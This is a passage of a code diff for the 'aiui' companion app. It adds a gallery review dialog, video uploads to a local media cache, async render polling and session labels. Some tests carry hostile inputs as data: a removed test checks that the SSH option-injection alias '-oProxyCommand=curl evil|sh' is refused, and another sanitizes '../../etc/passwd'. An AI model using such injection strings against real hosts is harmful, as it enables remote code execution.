+            "description": "Batch visual review: show several images and/or videos at once and collect a per-item decision (+ optional comment) in ONE window, instead of calling `confirm` once per asset. Use this for \"review these N generated images\", \"triage this batch of screenshots\", \"approve/revise/skip each of these renders\". Each item needs a stable `value` (the key you get decisions back under) and a `src` (data: URL, http(s):// URL, or absolute / `~/`-rooted local path on YOUR host — same resolution rules as the form `image` field; videos are detected by data:video/ MIME or .mp4/.mov/.m4v/.webm extension and rendered with native controls). Per-item buttons come from `actions` (default Approve / Revise / Skip); set `comment: true` to show a free-text field per item. Returns {cancelled, decisions: {\"<item value>\": {decision, comment?}}} — only items the user touched appear. For a single image sign-off use `confirm` with `image`; for one-of-N choice use `ask` with thumbnails. **Blocks until the user submits or cancels. Response can take minutes — progress notifications fire every ~10 s.**",
+            "inputSchema": {
+                "type": "object",
+                "required": ["items"],
+                "properties": {
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
+                    "title": { "type": "string", "description": "What the user is reviewing, e.g. \"Review 6 hero renders\"." },
+                    "description": { "type": "string", "description": "One sentence of context shown under the title." },
+                    "header": { "type": "string", "description": "Short chip above the title (≤ 14 chars)." },
+                    "items": {
+                        "type": "array",
+                        "description": "The assets to review. Order is preserved.",
+                        "items": {
+                            "type": "object",
+                            "required": ["value"],
+                            "properties": {
+                                "value": { "type": "string", "description": "Stable id; keys the returned decision. Must be non-empty and unique." },
+                                "src": { "type": "string", "description": "Image or video source: data: URL, http(s):// URL, or absolute / ~/ local path on YOUR host." },
+                                "alt": { "type": "string" },
+                                "label": { "type": "string", "description": "Caption shown under the thumbnail." },
+                                "detail": { "type": "string", "description": "Short context line beside/under the label." },
+                                "max_height": { "type": "number", "description": "Cap thumbnail height in px." }
+                            }
+                        }
+                    },
+                    "actions": {
+                        "type": "array",
+                        "description": "Per-item decision buttons. Defaults to Approve (green) / Revise / Skip if omitted.",
+                        "items": {
+                            "type": "object",
+                            "required": ["label", "value"],
+                            "properties": {
+                                "label": { "type": "string" },
+                                "value": { "type": "string", "description": "Returned as the item's `decision`." },
+                                "primary": { "type": "boolean" },
+                                "success": { "type": "boolean" },
+                                "destructive": { "type": "boolean" }
+                            }
+                        }
+                    },
+                    "comment": { "type": "boolean", "default": false, "description": "Show a free-text comment field per item." },
+                    "columns": { "type": "number", "description": "Grid columns. Omit for responsive auto-fill." },
+                    "submit_label": { "type": "string" },
+                    "cancel_label": { "type": "string" },
+                    "size": { "type": "string", "enum": ["s", "m", "l"], "description": "Starting window size hint: s / m / l. Default auto-sizes to the item count; pass l for a large batch or tall thumbnails so the grid opens roomy. Always resizable; never opens smaller than the content needs." },
+                    "width": { "type": "number", "description": "Explicit starting window width in logical px (overrides `size`)." },
+                    "height": { "type": "number", "description": "Explicit starting window height in logical px (overrides `size`)." }
                 }
             }
         },
@@ -533,6 +591,7 @@ async fn tools_call(
                     "cancelLabel": args.get("cancel_label"),
                     "image": args.get("image")
                 }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
                 cfg,
                 http,
             )
@@ -550,6 +609,7 @@ async fn tools_call(
                     "multiSelect": args.get("multi_select").and_then(|v| v.as_bool()).unwrap_or(false),
                     "allowOther": args.get("allow_other").and_then(|v| v.as_bool()).unwrap_or(false)
                 }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
                 cfg,
                 http,
             )
@@ -568,8 +628,37 @@ async fn tools_call(
                     "tabs": args.get("tabs"),
                     "actions": args.get("actions"),
                     "submitLabel": args.get("submit_label"),
-                    "cancelLabel": args.get("cancel_label")
+                    "cancelLabel": args.get("cancel_label"),
+                    "size": args.get("size"),
+                    "width": args.get("width"),
+                    "height": args.get("height")
                 }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
+                cfg,
+                http,
+            )
+            .await,
+            format_dialog_result,
+        ),
+
+        "gallery" => dispatch_render(
+            render_dialog(
+                json!({
+                    "kind": "gallery",
+                    "title": args.get("title"),
+                    "description": args.get("description"),
+                    "header": args.get("header"),
+                    "items": args.get("items"),
+                    "actions": args.get("actions"),
+                    "comment": args.get("comment").and_then(|v| v.as_bool()).unwrap_or(false),
+                    "columns": args.get("columns"),
+                    "submitLabel": args.get("submit_label"),
+                    "cancelLabel": args.get("cancel_label"),
+                    "size": args.get("size"),
+                    "width": args.get("width"),
+                    "height": args.get("height")
+                }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
                 cfg,
                 http,
             )
@@ -619,6 +708,54 @@ fn base_url(cfg: &AppConfig) -> String {
     format!("http://127.0.0.1:{}", cfg.http_port)
 }
 
+/// Upload a local video file to the companion's `POST /media` cache and return
+/// the playback URL found in the response. The file is read on *this* host (the
+/// local Mac, or the remote side of an SSH-tunneled session) and its bytes go
+/// over the same :7777 channel as the render, so local and remote work alike
+/// without any Mac→remote access. Every failure (unreadable file, 413, 404 from
+/// an old companion without `/media`) is an `Err` the caller treats as non-fatal.
+async fn upload_media(
+    http: &reqwest::Client,
+    cfg: &AppConfig,
+    token: &str,
+    path: &str,
+) -> Result<String, String> {
+    // Expand a leading `~/` against the home directory; if the home directory
+    // is unknown, fall back to the path exactly as given.
+    let local_file = path
+        .strip_prefix("~/")
+        .and_then(|tail| dirs::home_dir().map(|home| home.join(tail)))
+        .unwrap_or_else(|| std::path::PathBuf::from(path));
+    let payload = match tokio::fs::read(&local_file).await {
+        Ok(data) => data,
+        Err(e) => return Err(format!("read {}: {e}", local_file.display())),
+    };
+    let suffix = crate::imageresolve::video_ext(path);
+    let endpoint = format!("{}/media?ext={}", base_url(cfg), suffix);
+    let request = http
+        .post(&endpoint)
+        .bearer_auth(token)
+        .header("content-type", "application/octet-stream")
+        .body(payload)
+        .timeout(std::time::Duration::from_secs(120));
+    let response = match request.send().await {
+        Ok(r) => r,
+        Err(e) => return Err(format!("POST /media: {e}")),
+    };
+    let status = response.status();
+    if !status.is_success() {
+        return Err(format!("/media http {}", status));
+    }
+    let reply: Value = response
+        .json()
+        .await
+        .map_err(|e| format!("parse /media: {e}"))?;
+    match reply.get("url").and_then(Value::as_str) {
+        Some(url) => Ok(url.to_owned()),
+        None => Err("/media response missing url".to_string()),
+    }
+}
+
 /// Per-call dialog rendering can fail in two structurally different
 /// ways. v0.4.36 splits them so the tool dispatcher can convert
 /// `Busy` into a structured tool result (with retry-vs-tell-user
@@ -639,6 +776,7 @@ enum RenderError {
 
 async fn render_dialog(
     spec: Value,
+    session: Option<String>,
     cfg: &AppConfig,
     http: &reqwest::Client,
 ) -> Result<Value, RenderError> {
@@ -653,22 +791,47 @@ async fn render_dialog(
     // (imageresolve::resolve_image_srcs) only knows about HTTPS — it
     // would never see the remote's filesystem.
     let mut spec = spec;
+    // Video (2026-05-31): local video files are too big to inline as `data:`
+    // (10 MB cap, base64 bloat), so push them to the companion's /media cache
+    // and swap the path for the returned loopback playback URL. Done BEFORE
+    // `resolve_local_paths` so the image inliner never tries to base64 a
+    // video. Upload failures are non-fatal — the path is simply left as-is
+    // (the WebView shows a broken player rather than the call blowing up).
+    let videos = crate::imageresolve::collect_local_video_paths(&spec);
+    if !videos.is_empty() {
+        let mut map = std::collections::HashMap::new();
+        for path in videos {
+            match upload_media(http, cfg, &token, &path).await {
+                Ok(media_url) => {
+                    map.insert(path, media_url);
+                }
+                Err(e) => trace(&format!("render_dialog: media upload failed for {path}: {e}")),
+            }
+        }
+        crate::imageresolve::replace_srcs(&mut spec, &map);
+    }
     crate::imageresolve::resolve_local_paths(&mut spec);
-    let body = json!({ "spec": spec });
-    // POST /render is long-poll: the GUI holds the response open
-    // until the user clicks submit/cancel or the companion-side
-    // `DIALOG_TTL` sweep fires (currently 2 h). Override the shared
-    // reqwest client's 300-s default per-call so the user has the
-    // full TTL to fill out the form. We add 60 s slack on top so a
-    // backend-side TTL cancel still reaches us cleanly before our
-    // own timeout. v0.4.41.
+    // Step 4 (I8): forward the optional caller `session` label. This is the
+    // local bridge, so there is no `session_origin` (the companion treats an
+    // absent origin as local).
+    let body = json!({ "spec": spec, "session": session });
+    // Async render (Step 3): POST opts in via `x-aiui-async`; the companion
+    // registers + surfaces the dialog and returns immediately with
+    // `{id, ttl_secs}` (202). We then poll `GET /render/{id}` in bounded
+    // windows until the terminal result. No single connection is held for the
+    // user's think-time, so a tunnel/GUI blip can cost at most one poll
+    // window — never a multi-minute ReadError. The POST itself only covers
+    // registration + the ack handshake, so a short timeout suffices.
+    //
+    // Backward-compatible: an older companion ignores the unknown header and
+    // answers synchronously (200 with the terminal `{cancelled, …}` shape) —
+    // detected after the status checks below and used directly, no polling.
     let resp = http
         .post(&url)
         .bearer_auth(&token)
+        .header("x-aiui-async", "1")
         .json(&body)
-        .timeout(std::time::Duration::from_secs(
-            crate::dialog::DIALOG_TTL.as_secs() + 60,
-        ))
+        .timeout(std::time::Duration::from_secs(30))
         .send()
         .await
         .map_err(|e| RenderError::Transport(format!("POST /render: {e}")))?;
@@ -711,9 +874,57 @@ async fn render_dialog(
             resp.status()
         )));
     }
-    resp.json::<Value>()
+    let accepted = resp.status() == reqwest::StatusCode::ACCEPTED;
+    let first = resp
+        .json::<Value>()
         .await
-        .map_err(|e| RenderError::Transport(format!("parse /render: {e}")))
+        .map_err(|e| RenderError::Transport(format!("parse /render: {e}")))?;
+    if !accepted {
+        // Synchronous companion (old): `first` is already the terminal result.
+        return Ok(first);
+    }
+    // Async companion: poll `GET /render/{id}` until terminal. Each GET is
+    // bounded (40 s > the server's ~25 s poll window) so the server always
+    // answers `{pending:true}` before we time out, and we re-poll. The loop
+    // ends on the terminal result (incl. the server-side TTL's `cancelled`),
+    // a 404 (id expired / never registered), or any transport / non-2xx error.
+    let id = match first.get("id").and_then(|v| v.as_str()) {
+        Some(s) => s.to_string(),
+        None => {
+            return Err(RenderError::Transport(
+                "async /render: 202 response missing `id`".into(),
+            ))
+        }
+    };
+    let poll_url = format!("{}/render/{}", base_url(cfg), id);
+    loop {
+        let pr = http
+            .get(&poll_url)
+            .bearer_auth(&token)
+            .timeout(std::time::Duration::from_secs(40))
+            .send()
+            .await
+            .map_err(|e| RenderError::Transport(format!("GET /render/{id}: {e}")))?;
+        if pr.status() == reqwest::StatusCode::NOT_FOUND {
+            return Err(RenderError::Transport(format!(
+                "aiui lost track of render {id} (expired or never registered)"
+            )));
+        }
+        if !pr.status().is_success() {
+            return Err(RenderError::Transport(format!(
+                "render poll http {}",
+                pr.status()
+            )));
+        }
+        let pv = pr
+            .json::<Value>()
+            .await
+            .map_err(|e| RenderError::Transport(format!("parse /render/{id}: {e}")))?;
+        if pv.get("pending").and_then(|v| v.as_bool()) == Some(true) {
+            continue;
+        }
+        return Ok(pv);
+    }
 }
 
 /// Tool-call response signaling that the companion is alive but
diff --git a/companion/src-tauri/src/media.rs b/companion/src-tauri/src/media.rs
new file mode 100644
index 0000000..5b30dfc
--- /dev/null
+++ b/companion/src-tauri/src/media.rs
@@ -0,0 +1,203 @@
+//! Media cache for the gallery/form video feature (2026-05-31).
+//!
+//! ## Why this exists
+//!
+//! Images inline fine as `data:` URLs (the bridge-side resolvers do that).
+//! Video does not: a 50 MB clip is 67 MB of base64 in the render spec — it
+//! chokes the `get_dialog_spec` IPC and pins that much in the dialog
+//! registry. And a *remote* agent's local file isn't readable from the Mac
+//! at all — the only channel between them is the SSH **reverse** tunnel
+//! (remote → Mac on :7777). There is no Mac → remote forward (proven
+//! empirically; Claude Desktop provides none), so `scp` from the Mac is not
+//! an option.
+//!
+//! ## How it works
+//!
+//! The bridge (running on whichever host holds the file) **pushes** the
+//! bytes to the Mac over the existing :7777 channel: `POST /media`. The Mac
+//! stores them under its app cache dir and serves them back to the dialog
+//! WebView via `GET /media/blob/<file>` (range-capable, through
+//! `tower_http::services::ServeDir`). Because the reverse tunnel maps
+//! `remote:7777 → mac:7777`, the very same `http://127.0.0.1:7777/...`
+//! playback URL the upload returns is valid both on the remote (where the
+//! bridge runs) and on the Mac (where the WebView plays it).
+//!
+//! Serving is an unauthenticated **capability URL**: the filename is a v4
+//! UUID, unguessable, and the server only binds loopback (+ the user's own
+//! reverse tunnel). Uploads require the bearer token like every other
+//! mutating endpoint.
+//!
+//! ## Eviction
+//!
+//! The cache is bounded two ways, swept on every upload and once at startup:
+//! a per-file TTL (stale clips vanish even if the app never restarts) and a
+//! total-size cap (oldest-first deletion when the sum is exceeded). The
+//! cache is disposable — a missing file just renders as a broken `<video>`,
+//! never a crash — so the eviction is best-effort and never blocks a render.
+
+use std::path::{Path, PathBuf};
+use std::time::{Duration, SystemTime};
+
+use tauri::{AppHandle, Manager};
+use uuid::Uuid;
+
+/// How long a cached media file lives before the sweep removes it. Matches
+/// the dialog TTL — a clip is only ever needed while its dialog is open, and
+/// dialogs themselves expire at 2 h.
+pub const MEDIA_TTL: Duration = Duration::from_secs(2 * 60 * 60);
+
+/// Total cache-size ceiling. When an upload pushes the directory past this,
+/// the oldest files are deleted (by mtime) until it fits again. 1 GiB holds
+/// a healthy batch of review clips without letting a runaway session fill
+/// the user's disk.
+pub const MEDIA_TOTAL_CAP: u64 = 1024 * 1024 * 1024;
+
+/// Largest single upload accepted. Enforced at the HTTP layer via
+/// `DefaultBodyLimit`; duplicated here as the documented contract.
+pub const MEDIA_FILE_CAP: u64 = 512 * 1024 * 1024;
+
+/// Resolve the media cache directory, `<app-cache-dir>/media`, creating it
+/// (parents included) when missing; any failure surfaces as an `io::Error`.
+pub fn media_dir(app: &AppHandle) -> std::io::Result<PathBuf> {
+    let cache_root = match app.path().app_cache_dir() {
+        Ok(root) => root,
+        Err(e) => return Err(std::io::Error::other(format!("no app cache dir: {e}"))),
+    };
+    let media = cache_root.join("media");
+    std::fs::create_dir_all(&media).map(|()| media)
+}
+
+/// Reduce a wire-supplied extension to a safe filename suffix: ASCII
+/// letters and digits only, lowercased, at most 5 chars, `bin` when nothing
+/// survives. The value is attacker-influenced and lands in a filename *and*
+/// selects the served `Content-Type`, so separators and dots must not pass.
+pub fn sanitize_ext(raw: &str) -> String {
+    let mut safe = String::with_capacity(5);
+    for ch in raw.trim().trim_start_matches('.').chars() {
+        if safe.len() == 5 {
+            break;
+        }
+        if ch.is_ascii_alphanumeric() {
+            safe.push(ch.to_ascii_lowercase());
+        }
+    }
+    if safe.is_empty() {
+        safe.push_str("bin");
+    }
+    safe
+}
+
+/// Persist `bytes` under `dir` as a new `<uuid>.<ext>` file and hand back
+/// just that filename — the capability id of the `/media/blob/<file>` URL.
+pub fn store(dir: &Path, bytes: &[u8], ext: &str) -> std::io::Result<String> {
+    let suffix = sanitize_ext(ext);
+    let file_name = format!("{}.{suffix}", Uuid::new_v4());
+    std::fs::write(dir.join(&file_name), bytes)?;
+    Ok(file_name)
+}
+
+/// Best-effort eviction for the cache in `dir`: removes regular files older
+/// than `ttl`, then — if the rest still exceeds `total_cap` bytes — deletes
+/// oldest-first (by mtime) until it fits. An unreadable `dir` is a no-op and
+/// per-file errors are swallowed (a locked/just-deleted file must never abort
+/// a render); nothing is logged on this hot path, by design.
+pub fn sweep(dir: &Path, ttl: Duration, total_cap: u64) {
+    let Ok(entries) = std::fs::read_dir(dir) else {
+        return;
+    };
+    // (path, mtime, size) of every regular file that survives the TTL pass.
+    let mut files: Vec<(PathBuf, SystemTime, u64)> = Vec::new();
+    let now = SystemTime::now();
+    for entry in entries.flatten() {
+        let path = entry.path();
+        let Ok(meta) = entry.metadata() else { continue };
+        if !meta.is_file() {
+            continue;
+        }
+        let mtime = meta.modified().unwrap_or(now); // no mtime → treat as brand-new
+        // TTL pass: drop anything past its lifetime; a future mtime (Err) is kept.
+        if let Ok(age) = now.duration_since(mtime) {
+            if age > ttl {
+                let _ = std::fs::remove_file(&path);
+                continue;
+            }
+        }
+        files.push((path, mtime, meta.len()));
+    }
+    // Size pass: if still over the cap, evict oldest first.
+    let mut total: u64 = files.iter().map(|(_, _, sz)| *sz).sum();
+    if total <= total_cap {
+        return;
+    }
+    files.sort_by_key(|(_, mtime, _)| *mtime); // oldest first
+    for (path, _, sz) in files {
+        if total <= total_cap {
+            break;
+        }
+        if std::fs::remove_file(&path).is_ok() { // only count bytes actually freed
+            total = total.saturating_sub(sz);
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn sanitize_ext_strips_junk_and_caps_length() {
+        assert_eq!(sanitize_ext("mp4"), "mp4");
+        assert_eq!(sanitize_ext(".MOV"), "mov");
+        assert_eq!(sanitize_ext("../../etc/passwd"), "etcpa"); // separators gone, capped at 5
+        assert_eq!(sanitize_ext(""), "bin");
+        assert_eq!(sanitize_ext("..."), "bin");
+        assert_eq!(sanitize_ext("we!b@m#"), "webm");
+    }
+
+    #[test]
+    fn store_writes_uuid_named_file_with_ext() {
+        let dir = std::env::temp_dir().join(format!("aiui-media-test-{}", Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+        let name = store(&dir, b"hello", "mp4").unwrap();
+        assert!(name.ends_with(".mp4"));
+        let content = std::fs::read(dir.join(&name)).unwrap();
+        assert_eq!(content, b"hello");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+
+    #[test]
+    fn sweep_evicts_over_total_cap_oldest_first() {
+        let dir = std::env::temp_dir().join(format!("aiui-media-test-{}", Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+
+        // Three 100-byte files (300 total); a 250-byte cap must evict only the oldest.
+        let a = dir.join("a.bin");
+        let b = dir.join("b.bin");
+        let c = dir.join("c.bin");
+        std::fs::write(&a, vec![0u8; 100]).unwrap();
+        // Stagger mtimes so ordering is deterministic.
+        std::thread::sleep(Duration::from_millis(20));
+        std::fs::write(&b, vec![0u8; 100]).unwrap();
+        std::thread::sleep(Duration::from_millis(20));
+        std::fs::write(&c, vec![0u8; 100]).unwrap();
+
+        sweep(&dir, MEDIA_TTL, 250); // 2 h TTL: only the size pass can evict here
+
+        assert!(!a.exists(), "oldest should be evicted");
+        assert!(b.exists(), "newer survives");
+        assert!(c.exists(), "newest survives");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+
+    #[test]
+    fn sweep_removes_files_past_ttl() {
+        let dir = std::env::temp_dir().join(format!("aiui-media-test-{}", Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+        let f = dir.join("old.bin");
+        std::fs::write(&f, b"x").unwrap();
+        // TTL of zero → any file with a non-zero age already counts as stale.
+        sweep(&dir, Duration::from_secs(0), MEDIA_TOTAL_CAP);
+        assert!(!f.exists(), "file past TTL should be removed");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+}
diff --git a/companion/src-tauri/src/setup.rs b/companion/src-tauri/src/setup.rs
index 70b3b0d..68dda0e 100644
--- a/companion/src-tauri/src/setup.rs
+++ b/companion/src-tauri/src/setup.rs
@@ -214,16 +214,6 @@ mod host_alias_tests {
     #[test]
     fn rejects_newline() { assert!(!is_valid_host_alias("a\nb")); }
 
-    // kill_remote_mcp_stdio is the one ssh site that previously had no
-    // boundary validator (Issue #52 follow-up). An unsafe alias must be
-    // refused *before* any ssh spawn — this case returns early without
-    // touching the network, so it is safe to assert in a unit test.
-    #[test]
-    fn kill_remote_mcp_stdio_refuses_option_injection() {
-        let r = super::kill_remote_mcp_stdio("-oProxyCommand=curl evil|sh");
-        assert!(!r.ok);
-        assert!(r.message.contains("Refusing unsafe host alias"));
-    }
 }
 
 // Note: an earlier version of aiui patched ~/.ssh/config with a
@@ -822,57 +812,15 @@ print("ok:patched")
     (step, patch)
 }
 
-/// SIGTERM any `aiui-mcp` child still running on `host_alias` — used
-/// after a pin update so Claude Desktop / Claude Code respawns the
-/// child against the freshly pinned version on its next tool call.
-/// Idempotent: succeeds silently when no matching process is running.
-///
-/// `pkill -f` on macOS / Linux exit-codes: 0 = killed at least one,
-/// 1 = nothing matched. Both are success from our perspective; only
-/// the SSH layer or shell-not-found counts as a real failure.
-pub fn kill_remote_mcp_stdio(host_alias: &str) -> StepResult {
-    // Defense-in-depth: like every other remote helper, refuse an unsafe
-    // alias before spawning ssh. The `--` below already keeps host_alias
-    // out of ssh option position, but this was the only ssh call site that
-    // relied on `--` alone — adding the validator restores the "every
-    // remote helper validates at its boundary" invariant (Issue #52
-    // follow-up). host_alias here comes from remotes.json, so this is
-    // belt-and-suspenders rather than a live hole.
-    if !is_valid_host_alias(host_alias) {
-        return StepResult {
-            ok: false,
-            message: format!("Refusing unsafe host alias '{host_alias}'"),
-            details: None,
-        };
-    }
-    let out = no_window(
-        std::process::Command::new("ssh").args([
-            "-o",
-            "BatchMode=yes",
-            "--",
-            host_alias,
-            "pkill -f 'aiui-mcp' 2>/dev/null; true",
-        ]),
-    )
-    .output();
-    match out {
-        Err(e) => StepResult {
-            ok: false,
-            message: format!("ssh {host_alias} konnte nicht gestartet werden"),
-            details: Some(e.to_string()),
-        },
-        Ok(o) if !o.status.success() => StepResult {
-            ok: false,
-            message: format!("Stale-mcp-stdio-Sweep auf {host_alias} fehlgeschlagen"),
-            details: Some(String::from_utf8_lossy(&o.stderr).to_string()),
-        },
-        Ok(_) => StepResult {
-            ok: true,
-            message: format!("Stale aiui-mcp children on {host_alias} swept"),
-            details: None,
-        },
-    }
-}
+// Step 2 removed `kill_remote_mcp_stdio` (an `ssh … pkill -f 'aiui-mcp'`).
+// It existed to force a freshly-pinned version onto a running remote session,
+// but `pkill -f` crashed live sessions mid-call (Claude Code does not respawn
+// a disconnected MCP) and matched *every* aiui-mcp on the host — the remote
+// twin of the 0.4.42 Cowork-kill, and outright unsafe once parallel sessions
+// per remote are a requirement. The version pin in `~/.claude.json` now takes
+// effect at the next natural spawn; live sessions finish on their current
+// version. Deregistration (`remove_remote` / `uninstall_all`) relies on
+// config-removal + natural session end, not a broad kill.
 
 /// Result of a successful reachability probe — carries the absolute
 /// uvx path discovered on the remote so subsequent setup steps can
diff --git a/companion/src-tauri/tauri.conf.json b/companion/src-tauri/tauri.conf.json
index 4df09da..867f959 100644
--- a/companion/src-tauri/tauri.conf.json
+++ b/companion/src-tauri/tauri.conf.json
@@ -1,7 +1,7 @@
 {
   "$schema": "../node_modules/@tauri-apps/cli/config.schema.json",
   "productName": "aiui",
-  "version": "0.4.46",
+  "version": "0.8.1",
   "identifier": "de.byte5.aiui",
   "build": {
     "frontendDist": "../dist",
@@ -12,7 +12,7 @@
   "app": {
     "windows": [],
     "security": {
-      "csp": "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: asset: http://asset.localhost; font-src 'self' data:; connect-src 'self' ipc: http://ipc.localhost"
+      "csp": "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: asset: http://asset.localhost; media-src 'self' data: blob: http://127.0.0.1:* http://localhost:* https:; font-src 'self' data:; connect-src 'self' ipc: http://ipc.localhost http://127.0.0.1:* http://localhost:*"
     },
     "macOSPrivateApi": true
   },
@@ -46,4 +46,4 @@
       }
     }
   }
-}
\ No newline at end of file
+}
diff --git a/companion/src/i18n/de.json b/companion/src/i18n/de.json
index 045f44c..4b37e22 100644
--- a/companion/src/i18n/de.json
+++ b/companion/src/i18n/de.json
@@ -84,6 +84,9 @@
     "confirm.no": "Nein",
     "unknown_kind": "Unbekannter Widget-Typ: {kind}",
     "close": "Schließen",
+    "session_aria": "Sitzung, zu der dieser Dialog gehört",
+    "gallery.comment_placeholder": "Kommentar (optional)…",
+    "gallery.decided": "{n}/{total} entschieden",
     "ttl": {
       "yellow": "Noch ca. {countdown} Min zum Abschicken — danach werden die Eingaben automatisch verworfen.",
       "red": "Weniger als {countdown} bis zum automatischen Abbruch. Bitte jetzt abschicken oder abbrechen.",
diff --git a/companion/src/i18n/en.json b/companion/src/i18n/en.json
index 5a697b7..f9515e7 100644
--- a/companion/src/i18n/en.json
+++ b/companion/src/i18n/en.json
@@ -84,6 +84,9 @@
     "confirm.no": "No",
     "unknown_kind": "Unknown widget kind: {kind}",
     "close": "Close",
+    "session_aria": "Session this dialog belongs to",
+    "gallery.comment_placeholder": "Comment (optional)…",
+    "gallery.decided": "{n}/{total} decided",
     "ttl": {
       "yellow": "About {countdown} min left to submit — after that your input will be discarded automatically.",
       "red": "Less than {countdown} until auto-cancel. Please submit or cancel now.",
diff --git a/companion/src/lib/DialogShell.svelte b/companion/src/lib/DialogShell.svelte
index ecabdd8..67530fb 100644
--- a/companion/src/lib/DialogShell.svelte
+++ b/companion/src/lib/DialogShell.svelte
@@ -1,13 +1,23 @@
 <script lang="ts">
-  import { listen } from "@tauri-apps/api/event";
   import { invoke } from "@tauri-apps/api/core";
+  import { getCurrentWindow } from "@tauri-apps/api/window";
   import { _ } from "svelte-i18n";
   import { onMount } from "svelte";
   import Ask from "./widgets/Ask.svelte";
   import Form from "./widgets/Form.svelte";
   import Confirm from "./widgets/Confirm.svelte";
+  import Gallery from "./widgets/Gallery.svelte";
 
-  type DialogReq = { id: string; spec: any; ttl_secs?: number };
+  type DialogReq = {
+    id: string;
+    spec: any;
+    ttl_secs?: number;
+    // Multi-window (Step 4, I8): caller-set session label + remote-injected
+    // origin host, shown in the window chrome so the user can tell which
+    // session this dialog belongs to when several are open at once.
+    session?: string;
+    session_origin?: string;
+  };
 
   let current = $state<DialogReq | null>(null);
 
@@ -138,53 +148,45 @@
   }
 
   onMount(() => {
-    // Dialog event from Rust. We acknowledge receipt back to the Rust
-    // side immediately so the `/render` handler knows the WebView event
-    // loop is alive — this is the per-request liveness check that
-    // replaces the need for any background UI heartbeat. Backend emits
-    // this event with `emit_to("dialog", ...)`, so the setup window
-    // never sees it.
-    const dialogPromise = listen<DialogReq>("dialog:show", (e) => {
-      current = e.payload;
-      void invoke("dialog_received", { id: e.payload.id });
-      scheduleTtl(e.payload.ttl_secs, e.payload.id);
-    });
-
-    // UI ping from Rust (used by /health to verify the event loop). We
-    // pong back synchronously — the Rust side has a 100 ms timeout and
-    // a missed pong is what flips /health to `degraded`.
-    const pingPromise = listen<string>("ui:ping", (e) => {
-      void invoke("ui_pong", { id: e.payload });
-    });
+    // Multi-window pull model (Step 4): this window's label IS its dialog id.
+    // Fetch our own render payload from Rust by that id — the frontend
+    // initiates, so there's no `dialog:show` emit to race and no
+    // ready-handshake to perform. If the dialog is already gone
+    // (resolved/evicted before we mounted), close the window.
+    const id = getCurrentWindow().label;
+    void (async () => {
+      try {
+        const req = await invoke<DialogReq | null>("get_dialog_spec", { id });
+        if (!req) {
+          // Nothing to show — a stranded/already-resolved window. Close it.
+          try {
+            await invoke("close_window");
+          } catch (e) {
+            console.error(`[aiui] close_window (no spec) failed: ${e}`);
+          }
+          return;
+        }
+        current = req;
+        scheduleTtl(req.ttl_secs, req.id);
+        // Session identity (I8) is set as the native window title by Rust in
+        // build_dialog_window — the frontend setTitle is permission-gated
+        // (needs core:window:set-title), so we don't do it here.
+      } catch (e) {
+        console.error(`[aiui] get_dialog_spec failed for ${id}: ${e}`);
+      }
+    })();
 
     window.addEventListener("keydown", onKey);
 
-    // Window-close (native red X / ⌘W) is owned by Rust as of v0.4.46
-    // (on_window_event): it cancels any in-flight dialog and lets the
-    // window close, and the `/render` handler destroys the window on
-    // every terminal outcome. We deliberately no longer register a
-    // frontend `onCloseRequested` here. The 0.4.45 version called
-    // `event.preventDefault()` and then, if its cancel/close path failed
-    // (empty/stale dialog state), left the window stranded — visible,
-    // empty, and unclosable (Bug B, the 2026-05-29 overnight report).
-    // Letting Rust own teardown removes that fragile round-trip.
-
-    // Window-ready handshake (v0.4.30): tell the Rust render path
-    // that our `dialog:show` listener is installed and we can safely
-    // receive events. Without this, the backend would emit before
-    // Tauri actually wired up the listener — the very-first render of
-    // a fresh window would lose its event, hit the 500 ms ack timeout,
-    // and the user would see a blank window. We await both subscribe
-    // promises to ensure the listeners are *really* up before
-    // signalling, not just queued.
-    void Promise.all([dialogPromise, pingPromise]).then(() => {
-      void invoke("dialog_window_ready");
-    });
+    // Window-close (native red X / ⌘W) is owned by Rust (on_window_event):
+    // it cancels THIS window's dialog by its id and lets the window close,
+    // and the `/render` handler destroys the window on every terminal
+    // outcome. We deliberately don't register a frontend `onCloseRequested`
+    // — the 0.4.45 version's `preventDefault()` + failed close stranded
+    // empty windows (Bug B). Letting Rust own teardown removes that race.
 
-    return async () => {
+    return () => {
       clearTtlTimers();
-      (await dialogPromise)();
-      (await pingPromise)();
       window.removeEventListener("keydown", onKey);
     };
   });
@@ -193,11 +195,79 @@
     if (e.key === "Escape") handleCancel();
   }
 
+  /** Gathers every field that declares a `target` (file-write, issue #135),
+   *  first from the flat `fields`, then from each `tabs[].fields`, as
+   *  `{name, kind}` pairs — what to write out and which (secret) to strip. */
+  function collectTargetFields(spec: any): { name: string; kind: string }[] {
+    const tabs: any[] = Array.isArray(spec?.tabs) ? spec.tabs : [];
+    const groups: any[] = [spec?.fields, ...tabs.map((tab) => tab?.fields)];
+    const found: { name: string; kind: string }[] = [];
+    for (const group of groups) {
+      if (!Array.isArray(group)) continue;
+      for (const field of group) {
+        if (field && field.target != null && typeof field.name === "string") {
+          found.push({ name: field.name, kind: field.kind });
+        }
+      }
+    }
+    return found;
+  }
+
   async function handleSubmit(result: any) {
     if (!current) return;
     clearTtlTimers();
     const id = current.id;
+    const spec = current.spec;
+    const sessionOrigin = current.session_origin;
     current = null;
+
+    // Issue #135: write `target`-carrying fields to files on the agent's host.
+    // The write is always a LOCAL file op on whichever aiui module sits on the
+    // agent's host:
+    //   - Local native-app session (`session_origin` absent): the app writes
+    //     here, on the Mac, and strips secret values from the result so they
+    //     never reach the bridge/agent.
+    //   - Bridge-served session (`session_origin` set — remote SSH, or local
+    //     uvx): the bridge on the agent's host does the local write + strip.
+    //     We must NOT write or strip here, so the entered value reaches that
